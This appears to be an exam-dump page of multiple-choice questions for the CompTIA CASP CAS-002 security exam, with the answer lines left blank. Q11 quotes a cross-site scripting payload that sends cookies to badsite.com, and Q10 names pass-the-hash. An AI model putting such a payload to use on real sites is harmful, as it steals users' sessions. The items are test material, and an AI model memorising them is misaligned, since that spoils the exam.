Pinpoint of CAS-002 exam price materials and testing bible for CompTIA certification for IT learners, Real Success Guaranteed with Updated CAS-002 pdf dumps vce Materials. 100% PASS CompTIA Advanced Security Practitioner (CASP) exam Today!

Q1. - (Topic 4) 

Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare, education, and manufacturing. The security architect for company XYZ is reviewing a vendor proposal to reduce company XYZ’s hardware costs by combining multiple physical hosts through the use of virtualization technologies. The security architect notes concerns about data separation, confidentiality, regulatory requirements concerning PII, and administrative complexity on the proposal. Which of the following BEST describes the core concerns of the security architect? 

A. Most of company XYZ’s customers are willing to accept the risks of unauthorized disclosure and access to information by outside users. 

B. The availability requirements in SLAs with each hosted customer would have to be re-written to account for the transfer of virtual machines between physical platforms for regular maintenance. 

C. Company XYZ could be liable for disclosure of sensitive data from one hosted customer when accessed by a malicious user who has gained access to the virtual machine of another hosted customer. 

D. Not all of company XYZ’s customers require the same level of security and the administrative complexity of maintaining multiple security postures on a single hypervisor negates hardware cost savings. 

Answer:


Q2. - (Topic 5) 

An internal committee comprised of the facilities manager, the physical security manager, the network administrator, and a member of the executive team has been formed to address a recent breach at a company’s data center. It was discovered that during the breach, an HVAC specialist had gained entry to an area that contained server farms holding sensitive financial data. Although the HVAC specialist was there to fix a legitimate issue, the investigation concluded security be provided for the two entry and exit points for the server farm. Which of the following should be implemented to accomplish the recommendations of the investigation? 

A. Implement a policy that all non-employees should be escorted in the data center. 

B. Place a mantrap at the points with biometric security. 

C. Hire an HVAC person for the company, eliminating the need for external HVAC people. 

D. Implement CCTV cameras at both points. 

Answer:


Q3. - (Topic 1) 

A web services company is planning a one-time high-profile event to be hosted on the corporate website. An outage, due to an attack, would be publicly embarrassing, so Joe, the Chief Executive Officer (CEO), has requested that his security engineers put temporary preventive controls in place. Which of the following would MOST appropriately address Joe's concerns? 

A. Ensure web services hosting the event use TCP cookies and deny_hosts. 

B. Configure an intrusion prevention system that blocks IPs after detecting too many incomplete sessions. 

C. Contract and configure scrubbing services with third-party DDoS mitigation providers. 

D. Purchase additional bandwidth from the company’s Internet service provider. 

Answer:


Q4. - (Topic 3) 

A Physical Security Manager is ready to replace all 50 analog surveillance cameras with IP cameras with built-in web management. The Security Manager has several security guard desks on different networks that must be able to view the cameras without unauthorized people viewing the video as well. The selected IP camera vendor does not have the ability to authenticate users at the camera level. Which of the following should the Security Manager suggest to BEST secure this environment? 

A. Create an IP camera network and deploy NIPS to prevent unauthorized access. 

B. Create an IP camera network and only allow SSL access to the cameras. 

C. Create an IP camera network and deploy a proxy to authenticate users prior to accessing the cameras. 

D. Create an IP camera network and restrict access to cameras from a single management host. 

Answer:


Q5. - (Topic 5) 

Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. Currently, both companies use an AD backend and two factor authentication using TOTP. The system administrators have configured a trust relationship between the authentication backend to ensure proper process flow. How should the employees request access to shared resources before the authentication integration is complete? 

A. They should logon to the system using the username concatenated with the 6-digit code and their original password. 

B. They should logon to the system using the newly assigned global username: first.lastname#### where #### is the second factor code. 

C. They should use the username format: LAN\first.lastname together with their original password and the next 6-digit code displayed when the token button is depressed. 

D. They should use the username format: first.lastname@company.com, together with a password and their 6-digit code. 

Answer:


Q6. - (Topic 3) 

About twice a year a switch fails in a company's network center. Under the maintenance contract, the switch would be replaced in two hours losing the business $1,000 per hour. The cost of a spare switch is $3,000 with a 12-hour delivery time and would eliminate downtime costs if purchased ahead of time. The maintenance contract is $1,500 per year. 

Which of the following is true in this scenario? 

A. It is more cost-effective to eliminate the maintenance contract and purchase a replacement upon failure. 

B. It is more cost-effective to purchase a spare switch prior to an outage and eliminate the maintenance contract. 

C. It is more cost-effective to keep the maintenance contract instead of purchasing a spare switch prior to an outage. 

D. It is more cost-effective to purchase a spare switch prior to an outage and keep the maintenance contract. 

Answer:


Q7. - (Topic 5) 

As a cost saving measure, a company has instructed the security engineering team to allow all consumer devices to be able to access the network. They have asked for recommendations on what is needed to secure the enterprise, yet offer the most flexibility in terms of controlling applications, and stolen devices. Which of the following is BEST suited for the requirements? 

A. MEAP with Enterprise Appstore 

B. Enterprise Appstore with client-side VPN software 

C. MEAP with TLS 

D. MEAP with MDM 

Answer:


Q8. - (Topic 5) 

A security administrator is investigating the compromise of a software distribution website. Forensic analysis shows that several popular files are infected with malicious code. However, comparing a hash of the infected files with the original, non-infected files which were restored from backup, shows that the hash is the same. Which of the following explains this? 

A. The infected files were using obfuscation techniques to evade detection by antivirus software. 

B. The infected files were specially crafted to exploit a collision in the hash function. 

C. The infected files were using heuristic techniques to evade detection by antivirus software. 

D. The infected files were specially crafted to exploit diffusion in the hash function. 

Answer:

491. - (Topic 5) 

The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer’s (CSO) request to harden the corporate network’s perimeter. The CEO argues that the company cannot protect its employees at home, so the risk at work is no different. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary? 

A. The corporate network is the only network that is audited by regulators and customers. 

B. The aggregation of employees on a corporate network makes it a more valuable target for attackers. 

C. Home networks are unknown to attackers and less likely to be targeted directly. 

D. Employees are more likely to be using personal computers for general web browsing when they are at home. 

Answer:


Q9. - (Topic 2) 

A web developer is responsible for a simple web application that books holiday accommodations. The front-facing web server offers an HTML form, which asks for a user’s age. This input gets placed into a signed integer variable and is then checked to ensure that the user is in the adult age range. 

Users have reported that the website is not functioning correctly. The web developer has inspected log files and sees that a very large number (in the billions) was submitted just before the issue started occurring. Which of the following is the MOST likely situation that has occurred? 

A. The age variable stored the large number and filled up disk space which stopped the application from continuing to function. Improper error handling prevented the application from recovering. 

B. The age variable has had an integer overflow and was assigned a very small negative number which led to unpredictable application behavior. Improper error handling prevented the application from recovering. 

C. Computers are able to store numbers well above “billions” in size. Therefore, the website issues are not related to the large number being input. 

D. The application has crashed because a very large integer has lead to a “divide by zero”. Improper error handling prevented the application from recovering. 

Answer:


Q10. - (Topic 1) 

An external penetration tester compromised one of the client organization’s authentication servers and retrieved the password database. Which of the following methods allows the penetration tester to MOST efficiently use any obtained administrative credentials on the client organization’s other systems, without impacting the integrity of any of the systems? 

A. Use the pass the hash technique 

B. Use rainbow tables to crack the passwords 

C. Use the existing access to change the password 

D. Use social engineering to obtain the actual password 

Answer:


Q11. - (Topic 1) 

A security administrator notices the following line in a server's security log: 

<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cooki e</script>') + "' 

The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack? 

A. WAF 

B. Input validation 

C. SIEM 

D. Sandboxing 

E. DAM 

Answer:


Q12. - (Topic 5) 

During a recent audit of servers, a company discovered that a network administrator, who required remote access, had deployed an unauthorized remote access application that communicated over common ports already allowed through the firewall. A network scan showed that this remote access application had already been installed on one third of the servers in the company. Which of the following is the MOST appropriate action that the company should take to provide a more appropriate solution? 

A. Implement an IPS to block the application on the network 

B. Implement the remote application out to the rest of the servers 

C. Implement SSL VPN with SAML standards for federation 

D. Implement an ACL on the firewall with NAT for remote access 

Answer:


Q13. - (Topic 5) 

After a security incident, an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Which of the following would help meet these goals by having co-workers occasionally audit another worker's position? 

A. Least privilege 

B. Job rotation 

C. Mandatory vacation 

D. Separation of duties 

Answer:


Q14. - (Topic 2) 

Using SSL, an administrator wishes to secure public facing server farms in three subdomains: dc1.east.company.com, dc2.central.company.com, and dc3.west.company.com. Which of the following is the number of wildcard SSL certificates that should be purchased? 

A. 0 

B. 1 

C. 3 

D. 6 

Answer:


Q15. - (Topic 1) 

A company sales manager received a memo from the company’s financial department which stated that the company would not be putting its software products through the same security testing as previous years to reduce the research and development cost by 20 percent for the upcoming year. The memo also stated that the marketing material and service level agreement for each product would remain unchanged. The sales manager has reviewed the sales goals for the upcoming year and identified an increased target across the software products that will be affected by the financial department’s change. All software products will continue to go through new development in the coming year. Which of the following should the sales manager do to ensure the company stays out of trouble? 

A. Discuss the issue with the software product's user groups 

B. Consult the company’s legal department on practices and law 

C. Contact senior finance management and provide background information 

D. Seek industry outreach for software practices and law 

Answer: